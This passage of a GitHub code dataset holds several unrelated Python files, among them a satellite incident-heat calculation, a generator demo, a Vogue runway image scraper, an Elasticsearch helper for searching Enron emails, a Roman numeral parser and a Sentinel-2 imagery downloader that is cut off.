* np.pi) / T_orbita\npsi0 = Raan\nteta0 = inc\nphi0 = 0.0\n\npsi = []\nteta = []\nphi = []\n\nPosi_XYZ = propagador_orbital_mk3.propagador_orbital(rp, ecc, Raan, true_anomaly, inc, arg_per, num_orbita, 0)\n\nxyz = orientacao_quat.orientacao_quat(Ia, Ib, Ic, PSIP, TETAP, PHIP, psi0, teta0, phi0, T_orbita)\n\nori_xyz = np.zeros((len(Posi_XYZ), 3))\nK = len(xyz) / len(Posi_XYZ)\nj = 0\nfor i in range(0, len(xyz), int(K)):\n ori_xyz[j][0] = xyz[i][0]\n ori_xyz[j][1] = xyz[i][1]\n ori_xyz[j][2] = xyz[i][2]\n j = j + 1\nT = np.linspace(0, len(Posi_XYZ), len(Posi_XYZ))\nR_terra = terra.terra(Raio_terra, 10)\n\nVs = np.array([1, 0, 0])\n\nAi = [a * c,\n b * c,\n a * c,\n b * c,\n a * b,\n a * b]\n\nNi = [[1, 0, 0],\n [0, 1, 0],\n [-1, 0, 0],\n [0, -1, 0],\n [0, 0, -1],\n [0, 0, 1]]\n\nQs1 = []\nQs2 = []\nQs3 = []\nQs3 = []\nQs4 = []\nQs5 = []\nQs6 = []\n\nfor i in range(0, len(Posi_XYZ), 1):\n\n PSI = np.arccos(np.dot(Posi_XYZ[i], Vs) / (np.linalg.norm(Posi_XYZ[i]) * np.linalg.norm(Vs)))\n QSI = np.arcsin(Raio_terra / float(np.sqrt(Posi_XYZ[i][0] ** 2 + Posi_XYZ[i][1] ** 2 + Posi_XYZ[i][2] ** 2)))\n\n if PSI + QSI < np.pi:\n\n A1 = rotacao_Euler_2(Ni[0], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A2 = rotacao_Euler_2(Ni[1], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A3 = rotacao_Euler_2(Ni[2], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A4 = rotacao_Euler_2(Ni[3], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A5 = rotacao_Euler_2(Ni[4], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A6 = rotacao_Euler_2(Ni[5], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n\n k1 = np.dot(A1, Vs)\n k2 = np.dot(A2, Vs)\n k3 = np.dot(A3, Vs)\n k4 = np.dot(A4, Vs)\n k5 = np.dot(A5, Vs)\n k6 = np.dot(A6, Vs)\n\n if k1 > 0:\n qs1 = ai * Is * k1\n Qs1.append(qs1)\n else:\n Qs1.append(0)\n if k2 > 0:\n qs2 = ai * Is * k2\n Qs2.append(qs2)\n else:\n Qs2.append(0)\n\n if k3 > 0:\n qs3 = ai * Is * k3\n Qs3.append(qs3)\n else:\n Qs3.append(0)\n if k4 > 0:\n qs4 = ai * Is * k4\n Qs4.append(qs4)\n else:\n Qs4.append(0)\n if k5 > 0:\n qs5 = ai * Is * k5\n Qs5.append(qs5)\n else:\n Qs5.append(0)\n if k6 > 0:\n qs6 = ai * Is * k6\n Qs6.append(qs6)\n else:\n Qs6.append(0)\n\n else:\n Qs1.append(0)\n Qs2.append(0)\n Qs3.append(0)\n Qs4.append(0)\n Qs5.append(0)\n Qs6.append(0)\n\nQtotal = [[Qs1],\n [Qs2],\n [Qs3],\n [Qs4],\n [Qs5],\n [Qs6]]\n''' \nQ_total = [] \nfor i in range (0, 200, 1):\n Q_total.append(Qs1[i] + Qs2[i] + Qs3[i] + Qs4[i] + Qs5[i] + Qs6[i])\n'''\n\n'''\nplt.xlabel(\"Ponto da orbita\")\nplt.ylabel(\"Calor incidente em cada face [W/m^2]\")\nplt.plot(T, Qs1, color ='green', label='N1')\nplt.plot(T, Qs2, color = 'blue', label='N2')\nplt.plot(T, Qs3, color = 'cyan', label='N3')\nplt.plot(T, Qs4, color = 'yellow', label='N4')\nplt.plot(T, Qs5, color = 'red', label='N5')\nplt.plot(T, Qs6, color = 'magenta', label='N6') \n'''\n\ndivisao = int(5)\nTerra = terra.terra(Raio_terra, divisao)\nAs = sup_terra.sup_terra(Raio_terra, divisao)\nx = []\ny = []\nz = []\nfor i in range(0, len(Terra), 1):\n x.append(Terra[i][0])\n y.append(Terra[i][1])\n z.append(Terra[i][2])\n'''\nfig = plt.figure(figsize=(10,7))\nax = plt.axes(projection = \"3d\")\nax.scatter3D(x,y,z)\nplt.show() \n'''\n\n''' Albedo '''\n\nHalb1 = 0\nHalb2 = 0\nHalb3 = 0\nHalb4 = 0\nHalb5 = 0\nHalb6 = 0\n\nQalb1 = []\nQalb2 = []\nQalb3 = []\nQalb4 = []\nQalb5 = []\nQalb6 = []\n\nH1 = []\nH2 = []\nH3 = []\nH4 = []\nH5 = []\nH6 = []\n\nRhok = []\nprod_vet = []\n\nfor i in range(0, len(Posi_XYZ), 1):\n\n PSI = np.arccos(np.dot(Posi_XYZ[i], Vs) / (np.linalg.norm(Posi_XYZ[i]) * np.linalg.norm(Vs)))\n QSI = np.arcsin(Raio_terra / float(np.sqrt(Posi_XYZ[i][0] ** 2 + Posi_XYZ[i][1] ** 2 + Posi_XYZ[i][2] ** 2)))\n\n A1 = rotacao_Euler_2(Ni[0], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A2 = rotacao_Euler_2(Ni[1], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A3 = rotacao_Euler_2(Ni[2], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A4 = rotacao_Euler_2(Ni[3], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A5 = rotacao_Euler_2(Ni[4], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A6 = rotacao_Euler_2(Ni[5], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n\n if PSI + QSI < np.pi:\n\n for k in range(0, len(Terra), 1):\n\n rhok1 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A1)\n rhok2 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A2)\n rhok3 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A3)\n rhok4 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A4)\n rhok5 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A5)\n rhok6 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A6)\n\n rhok = np.array(Posi_XYZ[i]) - np.array(Terra[k])\n\n Rhok.append(rhok)\n prod_vet.append(np.dot(rhok, Terra[k]))\n\n C_bek = np.dot(Vs, Terra[k]) / (np.linalg.norm(Vs) * np.linalg.norm(Terra[k]))\n\n if np.dot(rhok1, Terra[k]) > 0:\n\n C_aek1 = np.dot(rhok1, Terra[k]) / (np.linalg.norm(rhok1) * np.linalg.norm(Terra[k]))\n C_aik1 = (np.dot(-rhok1, A1)) / (np.linalg.norm(rhok1) * np.linalg.norm(A1))\n\n if C_aik1 > 0 and C_aek1 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb1 = Halb1 + (As[k] * ((C_aek1 * C_bek * C_aik1) / (np.pi * np.linalg.norm(rhok1) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Halb1 = Halb1 + (As[k] * ((C_aek1 * C_bek * C_aik1) / (np.pi * np.linalg.norm(rhok1) ** 2)) * Balb)\n\n if np.dot(rhok2, Terra[k]) > 0:\n\n C_aek2 = np.dot(rhok2, Terra[k]) / (np.linalg.norm(rhok2) * np.linalg.norm(Terra[k]))\n C_aik2 = (np.dot(-rhok2, A2)) / (np.linalg.norm(rhok2) * np.linalg.norm(A2))\n\n if C_aik2 > 0 and C_aek2 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb2 = Halb2 + (As[k] * ((C_aek2 * C_bek * C_aik2) / (np.pi * np.linalg.norm(rhok2) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Halb2 = Halb2 + (As[k] * ((C_aek2 * C_bek * C_aik2) / (np.pi * np.linalg.norm(rhok2) ** 2)) * Balb)\n\n if np.dot(rhok3, Terra[k]) > 0:\n\n C_aek3 = np.dot(rhok3, Terra[k]) / (np.linalg.norm(rhok3) * np.linalg.norm(Terra[k]))\n C_aik3 = (np.dot(-rhok3, A3)) / (np.linalg.norm(rhok3) * np.linalg.norm(A3))\n\n if C_aik3 > 0 and C_aek3 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb3 = Halb3 + (As[k] * ((C_aek3 * C_bek * C_aik3) / (np.pi * np.linalg.norm(rhok3) ** 2)) * Balb)\n\n else:\n Balb = float(0.0)\n\n Halb3 = Halb3 + (As[k] * ((C_aek3 * C_bek * C_aik3) / (np.pi * np.linalg.norm(rhok3) ** 2)) * Balb)\n\n if np.dot(rhok4, Terra[k]) > 0:\n\n C_aek4 = np.dot(rhok4, Terra[k]) / (np.linalg.norm(rhok4) * np.linalg.norm(Terra[k]))\n C_aik4 = (np.dot(-rhok4, A4)) / (np.linalg.norm(rhok4) * np.linalg.norm(A4))\n\n if C_aik4 > 0 and C_aek4 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb4 = Halb4 + (As[k] * ((C_aek4 * C_bek * C_aik4) / (np.pi * np.linalg.norm(rhok4) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Halb4 = Halb4 + (As[k] * ((C_aek4 * C_bek * C_aik4) / (np.pi * np.linalg.norm(rhok4) ** 2)) * Balb)\n\n if np.dot(rhok5, Terra[k]) > 0:\n\n C_aek5 = np.dot(rhok5, Terra[k]) / (np.linalg.norm(rhok5) * np.linalg.norm(Terra[k]))\n C_aik5 = (np.dot(-rhok5, A5)) / (np.linalg.norm(rhok5) * np.linalg.norm(A5))\n\n if C_aik5 > 0 and C_aek5 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb5 = Halb5 + (As[k] * ((C_aek5 * C_bek * C_aik5) / (np.pi * np.linalg.norm(rhok5) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Halb5 = Halb5 + (As[k] * ((C_aek5 * C_bek * C_aik5) / (np.pi * np.linalg.norm(rhok5) ** 2)) * Balb)\n\n if np.dot(rhok6, Terra[k]) > 0:\n\n C_aek6 = np.dot(rhok6, Terra[k]) / (np.linalg.norm(rhok6) * np.linalg.norm(Terra[k]))\n C_aik6 = (np.dot(-rhok6, A6)) / (np.linalg.norm(rhok6) * np.linalg.norm(A6))\n\n if C_aik6 > 0 and C_aek6 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb6 = Halb6 + (As[k] * ((C_aek6 * C_bek * C_aik6) / (np.pi * np.linalg.norm(rhok6) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Halb6 = Halb6 + (As[k] * ((C_aek6 * C_bek * C_aik6) / (np.pi * np.linalg.norm(rhok6) ** 2)) * Balb)\n\n H1.append(Halb1)\n Qalb1.append(ai * gama * Is * Halb1)\n Halb1 = 0\n\n H2.append(Halb2)\n Qalb2.append(ai * gama * Is * Halb2)\n Halb2 = 0\n\n H3.append(Halb3)\n Qalb3.append(ai * gama * Is * Halb3)\n Halb3 = 0\n\n H4.append(Halb4)\n Qalb4.append(ai * gama * Is * Halb4)\n Halb4 = 0\n\n H5.append(Halb5)\n Qalb5.append(ai * gama * Is * Halb5)\n Halb5 = 0\n\n H6.append(Halb6)\n Qalb6.append(ai * gama * Is * Halb6)\n Halb6 = 0\n else:\n Qalb1.append(0)\n Qalb2.append(0)\n Qalb3.append(0)\n Qalb4.append(0)\n Qalb5.append(0)\n Qalb6.append(0)\n\n''' Radiacao da terra '''\n\nHrad1 = 0\nHrad2 = 0\nHrad3 = 0\nHrad4 = 0\nHrad5 = 0\nHrad6 = 0\n\nQrad1 = []\nQrad2 = []\nQrad3 = []\nQrad4 = []\nQrad5 = []\nQrad6 = []\n\nR1 = []\nR2 = []\nR3 = []\nR4 = []\nR5 = []\nR6 = []\n\nRrhok = []\nprod_vet2 = []\n\nfor i in range(0, len(Posi_XYZ), 1):\n\n A1 = rotacao_Euler_2(Ni[0], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A2 = rotacao_Euler_2(Ni[1], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A3 = rotacao_Euler_2(Ni[2], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A4 = rotacao_Euler_2(Ni[3], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A5 = rotacao_Euler_2(Ni[4], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A6 = rotacao_Euler_2(Ni[5], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n\n for k in range(0, len(Terra), 1):\n\n Rhok1 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A1)\n Rhok2 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A2)\n Rhok3 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A3)\n Rhok4 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A4)\n Rhok5 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A5)\n Rhok6 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A6)\n\n if np.dot(Rhok1, Terra[k]) > 0:\n\n C_aek1 = np.dot(Rhok1, Terra[k]) / (np.linalg.norm(Rhok1) * np.linalg.norm(Terra[k]))\n C_aik1 = (np.dot(-Rhok1, A1)) / (np.linalg.norm(Rhok1) * np.linalg.norm(A1))\n\n if C_aik1 > 0 and C_aek1 > 0:\n\n Balb = float(1.0)\n\n Hrad1 = Hrad1 + (As[k] * ((C_aek1 * C_aik1) / (np.pi * np.linalg.norm(Rhok1) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad1 = Hrad1 + (As[k] * ((C_aek1 * C_aik1) / (np.pi * np.linalg.norm(Rhok1) ** 2)) * Balb)\n\n if np.dot(Rhok2, Terra[k]) > 0:\n\n C_aek2 = np.dot(Rhok2, Terra[k]) / (np.linalg.norm(Rhok2) * np.linalg.norm(Terra[k]))\n C_aik2 = (np.dot(-Rhok2, A2)) / (np.linalg.norm(Rhok2) * np.linalg.norm(A2))\n\n if C_aik2 > 0 and C_aek2 > 0:\n\n Balb = float(1.0)\n\n Hrad2 = Hrad2 + (As[k] * ((C_aek2 * C_aik2) / (np.pi * np.linalg.norm(Rhok2) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad2 = Hrad2 + (As[k] * ((C_aek2 * C_aik2) / (np.pi * np.linalg.norm(Rhok2) ** 2)) * Balb)\n\n if np.dot(Rhok3, Terra[k]) > 0:\n\n C_aek3 = np.dot(Rhok3, Terra[k]) / (np.linalg.norm(Rhok3) * np.linalg.norm(Terra[k]))\n C_aik3 = (np.dot(-Rhok3, A3)) / (np.linalg.norm(Rhok3) * np.linalg.norm(A3))\n\n if C_aik3 > 0 and C_aek3 > 0:\n\n Balb = float(1.0)\n\n Hrad3 = Hrad3 + (As[k] * ((C_aek3 * C_aik3) / (np.pi * np.linalg.norm(Rhok3) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad3 = Hrad3 + (As[k] * ((C_aek3 * C_aik3) / (np.pi * np.linalg.norm(Rhok3) ** 2)) * Balb)\n\n if np.dot(Rhok4, Terra[k]) > 0:\n\n C_aek4 = np.dot(Rhok4, Terra[k]) / (np.linalg.norm(Rhok4) * np.linalg.norm(Terra[k]))\n C_aik4 = (np.dot(-Rhok4, A4)) / (np.linalg.norm(Rhok4) * np.linalg.norm(A4))\n\n if C_aik4 > 0 and C_aek4 > 0:\n\n Balb = float(1.0)\n\n Hrad4 = Hrad4 + (As[k] * ((C_aek4 * C_aik4) / (np.pi * np.linalg.norm(Rhok4) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad4 = Hrad4 + (As[k] * ((C_aek4 * C_aik4) / (np.pi * np.linalg.norm(Rhok4) ** 2)) * Balb)\n\n if np.dot(Rhok5, Terra[k]) > 0:\n\n C_aek5 = np.dot(Rhok5, Terra[k]) / (np.linalg.norm(Rhok5) * np.linalg.norm(Terra[k]))\n C_aik5 = (np.dot(-Rhok5, A5)) / (np.linalg.norm(Rhok5) * np.linalg.norm(A5))\n\n if C_aik5 > 0 and C_aek5 > 0:\n\n Balb = float(1.0)\n\n Hrad5 = Hrad5 + (As[k] * ((C_aek5 * C_aik5) / (np.pi * np.linalg.norm(Rhok5) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad5 = Hrad5 + (As[k] * ((C_aek5 * C_aik5) / (np.pi * np.linalg.norm(Rhok5) ** 2)) * Balb)\n\n if np.dot(Rhok6, Terra[k]) > 0:\n\n C_aek6 = np.dot(Rhok6, Terra[k]) / (np.linalg.norm(Rhok6) * np.linalg.norm(Terra[k]))\n C_aik6 = (np.dot(-Rhok6, A6)) / (np.linalg.norm(Rhok6) * np.linalg.norm(A6))\n\n if C_aik6 > 0 and C_aek6 > 0:\n\n Balb = float(1.0)\n\n Hrad6 = Hrad6 + (As[k] * ((C_aek6 * C_aik6) / (np.pi * np.linalg.norm(Rhok6) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad6 = Hrad6 + (As[k] * ((C_aek6 * C_aik6) / (np.pi * np.linalg.norm(Rhok6) ** 2)) * Balb)\n\n R1.append(Hrad1)\n Qrad1.append(e * Ir * (Hrad1))\n Hrad1 = 0\n\n R2.append(Hrad2)\n Qrad2.append(e * Ir * (Hrad2))\n Hrad2 = 0\n\n R3.append(Hrad3)\n Qrad3.append(e * Ir * (Hrad3))\n Hrad3 = 0\n\n R4.append(Hrad4)\n Qrad4.append(e * Ir * (Hrad4))\n Hrad4 = 0\n\n R5.append(Hrad5)\n Qrad5.append(e * Ir * (Hrad5))\n Hrad5 = 0\n\n R6.append(Hrad6)\n Qrad6.append(e * Ir * (Hrad6))\n Hrad6 = 0\n\nQt1 = []\nQt2 = []\nQt3 = []\nQt4 = []\nQt5 = []\nQt6 = []\n\nfor i in range(0, len(Qalb1), 1):\n Qt1.append(Qalb1[i] + Qs1[i] + Qrad1[i])\n Qt2.append(Qalb2[i] + Qs2[i] + Qrad2[i])\n Qt3.append(Qalb3[i] + Qs3[i] + Qrad3[i])\n Qt4.append(Qalb4[i] + Qs4[i] + Qrad4[i])\n Qt5.append(Qalb5[i] + Qs5[i] + Qrad5[i])\n Qt6.append(Qalb6[i] + Qs6[i] + Qrad6[i])\n\nfig = plt.figure()\nplt.xlabel(\"Ponto da orbita\")\nplt.ylabel(\"Calor incidente em cada face [W/m^2]\")\nplt.plot(T, Qt1, color='green', label='N1')\nplt.plot(T, Qt2, color='blue', label='N2')\nplt.plot(T, Qt3, color='cyan', label='N3')\nplt.plot(T, Qt4, color='yellow', label='N4')\nplt.plot(T, Qt5, color='red', label='N5')\nplt.plot(T, Qt6, color='magenta', label='N6')\nplt.legend()\nplt.show()\n","repo_name":"RodsCardozo/Lars-Software","sub_path":"calor_incidente.py","file_name":"calor_incidente.py","file_ext":"py","file_size_in_byte":16910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3470743688","text":"'https://realpython.com/introduction-to-python-generators/'\n\n'''\nWhen you call a generator function or use a generator expression, you return a special iterator called a generator. \nYou can assign this generator to a variable in order to use it. \nWhen you call special methods on the generator, such as next(), the code within the function is executed up to yield.\n\nWhen the Python yield statement is hit, the program suspends function execution and returns the yielded value to the caller. \n(In contrast, return stops function execution completely.) When a function is suspended, the state of that function is saved.\n'''\n\nmy_list = [1, 2, 3, 4, 5]\n\ndef my_generator():\n for item in my_list:\n yield item\n\nresult = my_generator()\n\nprint(next(result))\nprint(next(result))\nprint(next(result))","repo_name":"H0r4c3/Python_00_ALL","sub_path":"Generators/generators2.py","file_name":"generators2.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26001298496","text":"import json\nimport requests\nfrom bs4 import BeautifulSoup\nfrom PIL import Image\nfrom io import BytesIO\nimport os\nfrom unidecode import unidecode\n\n\n##### Takes in a designer (string) and returns all the shows (list) ##########################################\ndef designer_to_shows(designer):\n # Replace spaces, puncuations, special character, etc. with - and make lowercase\n designer = designer.replace(' ','-').replace('.','-').replace('&','').replace('+','').replace('--','-').lower()\n designer = unidecode(designer)\n\n # Designer URL\n URL = \"https://www.vogue.com/fashion-shows/designer/\" + designer\n\n # Make request\n r = requests.get(URL)\n\n # Soupify\n soup = BeautifulSoup(r.content, 'html5lib') # If this line causes an error, run 'pip install html5lib' or install html5lib\n\n # Load a dict of the json file with the relevent data\n js = str(soup.find_all('script', type='text/javascript')[3])\n js = js.split(' = ')[1]\n js = js.split(';<')[0]\n data = json.loads(js)\n\n # Find the show data within the json\n try:\n t = data['transformed']\n d = t['runwayDesignerContent']\n designer_collections = d['designerCollections']\n except:\n print('could not find shows')\n return []\n\n # Go through each show and add to list\n shows = []\n for show in designer_collections:\n shows.append(show['hed'])\n\n return shows\n####################################################################################################\n\n\n##### Takes in a designer (string) and show (string) and then downloads images to save path (string) ####################\ndef designer_show_to_download_images(designer, show, save_path):\n # Replace spaces with - and lowercase\n show = show.replace(' ','-').lower()\n show = unidecode(show)\n\n # Replace spaces, puncuations, special character, etc. with - and make lowercase\n designer = designer.replace(' ','-').replace('.','-').replace('&','').replace('+','').replace('--','-').lower()\n designer = unidecode(designer)\n\n # Check to see if images are already downloaded\n if(os.path.exists(save_path + '/' + designer+ '/' + show)):\n print('Photos already downloaded')\n return None\n\n # URL of the show\n url = \"https://www.vogue.com/fashion-shows/\" + show + '/' + designer\n\n # Make request\n r = requests.get(url)\n\n # Soupify\n soup = BeautifulSoup(r.content, 'html5lib') # If this line causes an error, run 'pip install html5lib' or install html5lib\n\n # Load a dict of the json file with the relevent data\n try:\n js = str(soup.find_all('script', type='text/javascript')[3])\n js = js.split(' = ')[1]\n js = js.split('; tags.'''\n fields = ['_X-From', '_X-To', '_body']\n if len(result['_source']['_Subject']) == 0:\n result['_source']['_Subject'] = 'N/A'\n for field in fields:\n result['_source'][field] = re.sub(r\"@ENRON\", \"\", result['_source'][field])\n result['_source'][field] = re.sub(r\"<(.*?)>\", \"\", result['_source'][field]).strip()\n if len(result['_source'][field]) > 50:\n result['_source'][field] = result['_source'][field][:50]+'...'\n return result\n\n\nasync def es_search(es, query):\n print('posting....')\n body = {\n \"size\" : 1000,\n \"query\": {\n \"function_score\": {\n \"query\": {\n \"multi_match\": {\n \"query\": query,\n \"fields\": [\"_From\", \"_To\", \"_Subject\", \"_body\"],\n \"fuzziness\" : \"AUTO\",\n \"prefix_length\" : 2\n\n }\n }\n }\n },\n \n }\n\n try:\n results = await es.search(\n index='enron', body=body\n )\n\n if len(results) == 0:\n return \"Nothing found.\"\n \n total = results['hits']['total']['value']\n print(f'Total results: {total}')\n \n results = results['hits']['hits']\n results = list(map(clean_address, results))\n \n print(results[:2])\n except Exception as e:\n print('Error: ', e)\n \n fields = {'_Date':'Date', '_X-From':'From', '_X-To':'To', '_Subject': 'Subject', '_score':'Score'}\n\n return results, total","repo_name":"mcgowaji/records-mgmt","sub_path":"app/library/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30004300947","text":"\nfrom itertools import zip_longest\ndef parse_roman_numeral(txt):\n d = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n neg_combo = [('I', 'VX'), ('X', 'LC'), ('C', 'DM')]\n res = 0\n for i, j in zip_longest(txt, txt[1:]):\n for x in [x for x in neg_combo]:\n if i in x[0] and j and j in x[1]:\n res += d[j] - d[i]\n res -= d[j] \n break \n else:\n res += d[i] \n return res\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"oepiudBYC7PT7TXAM_22.py","file_name":"oepiudBYC7PT7TXAM_22.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39536466682","text":"import Rappture\nimport sys\n\n# uncomment these for debugging\n# sys.stdout = open('enc.out', 'w')\n# sys.stderr = open('enc.err', 'w')\n\n# open the XML file containing the run parameters\nrx = Rappture.PyXml(sys.argv[1])\n\nmodel = rx['input.(model).current'].value\n\nif model == 'dd':\n result = \"Drift-Diffusion:\\n\"\n recomb = rx['input.(dd).(recomb).current'].value\n result += \" Recombination model: %s\\n\" % recomb\n if recomb:\n taun = rx['input.(dd).(taun).current'].value\n taup = rx['input.(dd).(taup).current'].value\n result += \" TauN: %s\\n\" % taun\n result += \" TauP: %s\\n\" % taup\nelif model == 'bte':\n result = \"Boltzmann Transport Equation:\\n\"\n temp = rx[\"input.(bte).(temp).current\"].value\n result += \" Temperature: %s\\n\" % temp\n secret = rx['input.(bte).(secret).current'].value\n result += \" Hidden number: %s\\n\" % secret\nelif model == 'negf':\n result = \"NEGF Analysis:\\n\"\n tbe = rx['input.(negf).(tbe).current'].value\n result += \" Tight-binding energy: %s\\n\" % tbe\n tau = rx['input.(negf).(tau).current'].value\n result += \" High-energy lifetime: %s\\n\" % tau\n\nrx['output.log'] = result\n\n# save the updated XML describing the run...\nrx.close()\n","repo_name":"AenBleidd/rappture","sub_path":"examples/zoo/enable/enable.py","file_name":"enable.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8452273899","text":"# coding:utf-8\nimport argparse\nimport csv\nimport math\nfrom multiprocessing.dummy import Pool, Lock\nimport os\nimport datetime as DATETIME\nimport random\nimport geemap\n# datetime.strptime(str(a),\"%Y%m%d\")\nimport warnings\n\nwarnings.simplefilter('ignore', UserWarning)\nimport ee\nimport numpy as np\nimport urllib3\n\nALL_BANDS = ['B1', 'B2', 'B3', 'B4', 'B5', 'B6', 'B7', 'B8', 'B8A', 'B9', 'B11', 'B12']\nRGB_BANDS = ['B4', 'B3', 'B2']\nRGB_BANDS_NIR = ['B4', 'B3', 'B2', 'B8']\ndates = [2016,\n 2017,\n 2018,\n 2019,\n 2020,\n 2021]\n\n\nclass UniformSampler:\n\n def sample_point(self):\n lon = np.random.uniform(-180, 180)\n lat = np.random.uniform(-90, 90)\n return [lon, lat]\n\n\ndef read_csv(file):\n points = []\n with open(file, encoding=\"unicode_escape\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n lon = row[4]\n lat = row[5]\n if lon == \"x\":\n continue\n points.append([float(lon), float(lat)])\n return points\n\n\nclass GaussianSampler:\n\n def __init__(self, interest_points=None, std=150, size=None):\n self.interest_points = interest_points\n self.std = std\n self.size = size\n self.count = 0\n\n def initialize_point(self):\n center_point = self.interest_points[self.count]\n self.count += 1\n return center_point\n\n def sample_one_point(self, center_point):\n std = self.km2deg(self.std)\n lon, lat = np.random.normal(loc=center_point, scale=[std, std]) # Gaussian Sample\n # lon, lat = self.getRandomPointInCircle(radius=std, centerx=center_point[0],\n # centery=center_point[1]) # Circle sample\n return [lon, lat]\n\n @staticmethod\n def km2deg(kms, radius=6371):\n return kms / (2.0 * radius * np.pi / 360.0)\n\n @staticmethod\n def getRandomPointInCircle(radius, centerx, centery):\n theta = random.random() * 2 * np.pi\n r = random.uniform(0, radius ** 2)\n x = math.cos(theta) * (r ** 0.5) + centerx\n y = math.sin(theta) * (r ** 0.5) + centery\n\n return x, y\n\n\ndef downloadS2andDynamicWorld(sampler, dates, center_coord, sub_location_path, cloud_pct, debug=False):\n coord = sampler.sample_one_point(center_coord)\n periods = get_period(dates)\n # We use the size of 64*64 samples for training, so the radius of the buffer is 320 meters (10 meters resolution)\n loc = ee.Geometry.Point(coord).buffer(320).bounds()\n try:\n for period in periods:\n s2_collection = (\n ee.ImageCollection('COPERNICUS/S2')\n .filterBounds(loc)\n .filterDate(period[0], period[1])\n .filter(ee.Filter.lt('CLOUDY_PIXEL_PERCENTAGE', cloud_pct))\n .map(maskS2clouds)\n )\n dynamicWorld_collection = ee.ImageCollection(\"GOOGLE/DYNAMICWORLD/V1\"). \\\n filterDate(period[0], period[1]). \\\n filterBounds(loc)\n s2_image = s2_collection.median().select(['B2', 'B3', 'B4', \"B8\"]).clip(loc).divide(10000.0)\n dynamicWorld_image = dynamicWorld_collection.median().select([\"built\"]).clip(loc)\n geemap.download_ee_image(s2_image, f\"{sub_location_path}/{period[0].split('-')[0]}_s2.tif\", scale=10,\n region=loc,\n crs=\"EPSG:4326\") # EPSG:4326 is WGS84\n geemap.download_ee_image(dynamicWorld_image,\n f\"{sub_location_path}/{period[0].split('-')[0]}_dynamicWorld.tif\", scale=10,\n region=loc,\n crs=\"EPSG:4326\")\n # Sometimes the network is disconnected (more noticeable in mainland China), so it needs to be re-run\n except (ee.EEException, urllib3.exceptions.HTTPError) as e:\n if debug:\n print(e)\n downloadS2andDynamicWorld(sampler, dates, center_coord, sub_location_path, cloud_pct, debug=debug)\n\n\ndef maskS2clouds(image):\n qa = image.select('QA60')\n\n # Bits 10 and 11 are clouds and cirrus, respectively.\n cloudBitMask = 1 << 10\n cirrusBitMask = 1 << 11\n\n # Both flags should be set to zero, indicating clear conditions.\n mask = qa.bitwiseAnd(cloudBitMask).eq(0)\n mask = mask.bitwiseAnd(cirrusBitMask).eq(0)\n\n return image.updateMask(mask)\n\ndef get_period(dates):\n year1, year2, year3 = random.sample(dates, 3)\n time1_0 = DATETIME.date(year1, 1, 1)\n time1_1 = 